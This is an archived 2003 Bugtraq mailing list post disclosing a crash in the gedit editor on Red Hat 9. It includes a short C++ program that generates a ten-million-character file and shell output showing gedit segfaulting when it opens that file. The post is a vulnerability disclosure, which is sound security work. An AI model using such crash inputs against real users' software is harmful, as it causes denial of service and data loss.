lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 23 Nov 2003 16:37:30 +0200
From: Andreas "Constantinides (MegaHz)" <megahz@...ahz.org>
To: bugtraq@...urityfocus.com
Subject: simple buffer overflow in gedit


Hello,
I discover a strange but simple buffer overflow in gedit.
I am using RH9, 


to demostrate the buffer here is a simple file buffer generator:

===========buffer.c == cut here===============
/*
	simple buffer overflow generator by MegaHz megahz@...ahz.org
*/
#include <iostream>
using namespace std;
 
int main()
{
int i;
for (i=0;i<=9999999;i++)
        {
        cout << "A";
        }
        return 0;
}
===========================================


# g++ -o buffer buffer.c
# ./buffer > lala
# gedit lala
Segmentation fault
#


MegaHz (Andreas Constantinides)
www.megahz.org
www.cyhackportal.com




Powered by blists - more mailing lists